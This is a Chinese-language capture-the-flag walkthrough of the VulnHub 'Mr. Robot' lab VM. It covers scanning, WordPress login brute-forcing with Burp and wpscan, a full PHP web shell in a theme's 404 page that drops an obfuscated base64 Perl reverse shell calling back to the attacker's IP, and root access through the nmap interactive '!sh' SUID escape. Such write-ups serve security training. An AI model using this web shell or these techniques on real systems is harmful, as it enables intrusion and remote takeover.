靶机下载地址:https://download.vulnhub.com/mrrobot/mrRobot.ova.torrent
这次靶机的名称是Mr.root
kali:192.168.100.8
Win7:192.168.100.9
==================================================================================================
信息收集
扫描下靶机的IP地址:
nmap -sP 192.168.100.0/24
可以看出靶机的IP地址为192.168.100.13
然后在用nmap -p 1-65535 192.168.100.13 对目标靶机进行端口扫描
我们先从80开始下手
网页动画就是linux开机登陆的过程,到后面会给你提供几个命令
我们看下他的robots.txt
http://192.168.100.13/robots.txt
打开fsocity.dic有点像一个爆破的字典
我们下载过来并去重保存
wget http://192.168.100.13/fsocity.dic
cat fsocity.dic | sort | uniq > fsocity_sorted.dic
再打开key-1-of-3.txt
得到:
073403c8a58a1f80d943455fb30724b9
然后尝试用MD5解密,但是照不出结果
然后我们再用nikto扫描下靶机的漏洞
nikto -h 192.168.100.13
root@kali:~# nikto -h 192.168.100.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.100.13
+ Target Hostname: 192.168.100.13
+ Target Port: 80
+ Start Time: 2018-12-02 15:10:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.100.13/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2018-12-02 15:12:36 (GMT8) (153 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
其中有包括大量的wp的信息
同样你可以使用nmap来扫描得到路径
nmap -Pn -n -p80 --script http-enum 192.168.100.13
root@kali:~# nmap -Pn -n -p80 --script http-enum 192.168.100.13
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-02 15:40 CST
Nmap scan report for 192.168.100.13
Host is up (0.00029s latency).PORT STATE SERVICE
80/tcp open http
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /feed/: Wordpress version: 4.3.17
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /image/: Potentially interesting folder
MAC Address: 08:00:27:26:9E:38 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 38.05 seconds
那么我们用wpsacn工具看看能不能找到更多有用的信息
wpscan --url 192.168.100.13 -e vp
root@kali:~# wpscan --url 192.168.100.13 -e vp
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________[+] URL: http://192.168.100.13/
[+] Started: Sun Dec 2 15:18:48 2018[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] robots.txt available under: http://192.168.100.13/robots.txt [HTTP 200]
[+] XML-RPC Interface available under: http://192.168.100.13/xmlrpc.php [HTTP 405][+] Enumerating WordPress version ...
[!] The WordPress 'http://192.168.100.13/readme.html' file exists exposing a version number[+] WordPress version 4.3.17 (Released on 2018-07-05) identified from links opml
[+] Enumerating installed plugins (only ones with known vulnerabilities) ...
Time: 00:00:38 <====================================================================================================> (1671 / 1671) 100.00% Time: 00:00:38
[+] We found 8 plugins:
[+] Name: akismet
| Latest version: 4.1
| Last updated: 2018-11-12T19:38:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/akismet/[!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5[+] Name: all-in-one-seo-pack - v2.0.4
| Last updated: 2018-10-24T22:24:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/
| Readme: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/readme.txt
[!] The version is out of date, the latest version is 2.9.1[!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS
Reference: https://wpvulndb.com/vulnerabilities/6888
Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6[!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation
Reference: https://wpvulndb.com/vulnerabilities/6889
Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6[!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/7881
Reference: http://jvn.jp/en/jp/JVN75615300/index.html
Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
[i] Fixed in: 2.2.6[!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7916
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 2.2.6.2[!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8538
Reference: http://seclists.org/fulldisclosure/2016/Jul/23
Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
Reference: https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
Reference: https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
[i] Fixed in: 2.3.7[!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8558
Reference: https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
[i] Fixed in: 2.3.8[+] Name: all-in-one-wp-migration - v2.0.4
| Last updated: 2018-11-22T10:17:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/
| Readme: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/readme.txt
[!] The version is out of date, the latest version is 6.80[!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export
Reference: https://wpvulndb.com/vulnerabilities/7857
Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability
Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export
[i] Fixed in: 2.0.5[!] Title: All-in-One WP Migration <= 6.45 - Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8851
Reference: https://wordpress.org/plugins/all-in-one-wp-migration/#developers
[i] Fixed in: 6.46[+] Name: contact-form-7 - v4.1
| Last updated: 2018-10-29T23:58:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/contact-form-7/
| Readme: http://192.168.100.13/wp-content/plugins/contact-form-7/readme.txt
[!] The version is out of date, the latest version is 5.0.5[!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
Reference: https://wpvulndb.com/vulnerabilities/9127
Reference: https://contactform7.com/2018/09/04/contact-form-7-504/
Reference: https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
Reference: https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
Reference: https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
Reference: https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
[i] Fixed in: 5.0.4[+] Name: google-analytics-for-wordpress - v5.3.2
| Last updated: 2018-11-27T18:47:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/
| Readme: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/readme.txt
[!] The version is out of date, the latest version is 7.3.2[!] Title: Google Analytics by Yoast <= 5.3.2 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7838
Reference: http://packetstormsecurity.com/files/130716/
[i] Fixed in: 5.3.3[!] Title: Google Analytics by Yoast <= 5.3.2 - Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7856
Reference: https://yoast.com/ga-plugin-security-update-more/
Reference: http://klikki.fi/adv/yoast_analytics.html
Reference: http://packetstormsecurity.com/files/130935/
[i] Fixed in: 5.3.3[!] Title: Google Analytics by Yoast <= 5.3.3 - Unauthenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7914
Reference: https://yoast.com/coordinated-security-release/
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
Reference: http://klikki.fi/adv/yoast_analytics2.html
[i] Fixed in: 5.4[!] Title: Google Analytics by Yoast <= 5.4.4 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8147
Reference: https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/
[i] Fixed in: 5.4.5[+] Name: google-sitemap-generator - v4.0.7.1
| Last updated: 2018-04-25T15:06:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/
| Readme: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/readme.txt
[!] The version is out of date, the latest version is 4.0.9[!] Title: Google XML Sitemaps <= 4.0.8 - Authenticated Reflected XSS (via HOST header)
Reference: https://wpvulndb.com/vulnerabilities/8762
Reference: https://plugins.trac.wordpress.org/browser/google-sitemap-generator/trunk/sitemap-ui.php#L1310
[i] Fixed in: 4.0.9[+] Name: jetpack - v3.3.2
| Last updated: 2018-11-27T11:01:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/jetpack/
| Readme: http://192.168.100.13/wp-content/plugins/jetpack/readme.txt
[!] The version is out of date, the latest version is 6.8[!] Title: Jetpack 3.0-3.4.2 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7915
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
Reference: https://jetpack.me/2015/04/20/jetpack-3-4-3-coordinated-security-update/
[i] Fixed in: 3.4.3[!] Title: Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7964
Reference: https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
[i] Fixed in: 3.5.3[!] Title: Jetpack <= 3.7.0 - Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8201
Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html
[i] Fixed in: 3.7.1[!] Title: Jetpack <= 3.7.0 - Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8202
Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
[i] Fixed in: 3.7.1[!] Title: Jetpack <= 3.9.1 - LaTeX HTML Element XSS
Reference: https://wpvulndb.com/vulnerabilities/8472
Reference: https://jetpack.com/2016/02/25/jetpack-3-9-2-maintenance-and-security-release/
Reference: https://github.com/Automattic/jetpack/commit/dbc33b9105c4dbb0de81544e682a8b6d5ab7e446
[i] Fixed in: 3.9.2[!] Title: Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8500
Reference: https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/
Reference: http://wptavern.com/jetpack-4-0-3-patches-a-critical-xss-vulnerability
Reference: https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10706
[i] Fixed in: 4.0.3[!] Title: Jetpack <= 4.0.3 - Multiple Vulnerabilities
Reference: https://wpvulndb.com/vulnerabilities/8517
Reference: https://jetpack.com/2016/06/20/jetpack-4-0-4-bug-fixes/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10705
[i] Fixed in: 4.0.4[+] Name: wptouch - v3.7.3
| Last updated: 2018-11-21T19:54:00.000Z
| Location: http://192.168.100.13/wp-content/plugins/wptouch/
| Readme: http://192.168.100.13/wp-content/plugins/wptouch/readme.txt
[!] The version is out of date, the latest version is 4.3.34[!] Title: WPtouch Mobile Plugin <= 3.7.5.3 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7920
Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 3.7.6[+] Finished: Sun Dec 2 15:19:36 2018
[+] Elapsed time: 00:00:47
[+] Requests made: 2110
[+] Memory used: 135.586 MB
枚举靶机wp中易受到攻击的插件,但是最后利用失败
我们访问下/wp-admin
尝试默认的账号密码admin/admin
出错
在这里我用burp爆破下用户名,字典就是之前整理好的fsocity_sorted.dic字典
抓下登录的post包,然后对username进行爆破,密码随意。
结果如下
我们账号用elliot当账号去登陆
出现的提示着这样的,说明elliot这个账号是可以用的
然后我们把username用elliot代替,对password再用这个字典进行爆破结果如下
然后成功进入后台
同样的你也可以用wpscan爆破
wpscan --url http://192.168.100.13 --wordlist=/root/fsocity_sorted.dic --username elliot --threads 20
登陆后台后选择
利用php反弹shell
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.100.8"; //yourip
$yourport = '5555'; //yourport
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
然后用kali进行nc监听
更新404页面后,在博客上随便访问个不存在的页面来触发反弹代码
然后我们ls下看下有什么文件
没什么信息 我们取home目录看下
这里有第2个key,但是我们没有读的权限,只有robot能看
下面有个md5文件,我们可以读
然后我们取解密下这段
解密结果:abcdefghijklmnopqrstuvwxyz
那么我们就可以切换到root身份然后读取那个文件了
但是输入密码需要tty,方法有很多这里我用python的方法
得到key2
822c73956184f694993bede3eb39f959
接下来就是提权
检查下靶机的内核信息
有了这些信息,我前往https://www.exploit-db.com/并寻找一些我可以使用的权限升级漏洞。我尝试了OFS [CVE-2015-1328]和recvmsg [CVE-2014-0038]漏洞利用程序,但都未能获得root权限。
试下别的方法提升权限
找下系统中所有suid文件
这里有个nmap,就会想到一个经典的利用nmap的
较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。
查看下nmap版本
进入Nmap交互模式
nmap --interactive
以下命令将提供一个提升的shell。
!sh
现在我有root访问权限,我运行了以前用来尝试查找所有与密钥文件(find / -name 'key-*-of-3.txt' 2>/dev/null)的命名模式相匹配的文件的命令
find / -name 'key-*-of-3.txt' 2>/dev/null